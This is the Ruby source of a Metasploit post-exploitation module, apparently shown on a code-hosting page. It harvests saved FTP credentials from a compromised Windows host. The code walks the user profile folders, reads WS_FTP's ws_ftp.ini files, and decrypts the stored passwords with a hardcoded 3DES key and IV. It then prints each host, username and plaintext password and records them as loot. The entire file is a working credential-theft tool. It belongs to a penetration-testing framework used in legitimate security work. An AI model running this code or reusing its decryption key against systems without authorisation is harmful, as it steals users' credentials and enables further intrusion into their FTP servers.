metasploit-framework/modules/post/windows/gather/wsftp_client_creds.rb

112 lines
3.0 KiB
Ruby

# $Id$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'rex/parser/ini'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather WS_FTP Saved Password Extraction',
'Description' => %q{ This module extracts weakly encrypted saved FTP Passwords
from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file. },
'License' => MSF_LICENSE,
'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
print_status("Checking Default Locations...")
os = session.sys.config.sysinfo['OS']
drive = session.fs.file.expand_path("%SystemDrive%")
if os =~ /Windows 7|Vista|2008/
@appdata = '\\AppData\\Roaming\\'
@users = drive + '\\Users'
else
@appdata = '\\Application Data\\'
@users = drive + '\\Documents and Settings'
end
get_users
@userpaths.each do |path|
check_appdata(path)
end
end
def check_appdata(path)
filename = "#{path}#{@appdata}\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
begin
iniexists = client.fs.file.stat(filename)
print_status("Found File at #{filename}")
get_ini(filename)
rescue
print_status("#{filename} not found ....")
end
end
def get_users
@userpaths = []
session.fs.dir.foreach(@users) do |path|
next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
@userpaths << "#{@users}\\#{path}\\"
end
end
def get_ini(filename)
config = client.fs.file.new(filename, 'r')
parse = config.read
ini = Rex::Parser::Ini.from_s(parse)
ini.each_key do |group|
next if group == "_config_"
print_status("Processing Saved Session #{group}")
host = ini[group]['HOST']
host = host.delete "\""
username = ini[group]['UID']
username = username.delete "\""
port = ini[group]['PORT']
passwd = ini[group]['PWD']
passwd = decrypt(passwd)
next if passwd == nil or passwd == ""
port = 21 if port == nil
print_good("Host: #{host} Port: #{port} User: #{username} Password: #{passwd}")
report_auth_info(
:host => host,
:port => port,
:sname => 'FTP',
:user => username,
:pass => passwd)
end
end
def decrypt(pwd)
decoded = pwd.unpack("m*")[0]
key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"
iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"
des = OpenSSL::Cipher::Cipher.new("des-ede3-cbc")
des.decrypt
des.key = key
des.iv = iv
result = des.update(decoded)
final = result.split("\000")[0]
return final
end
end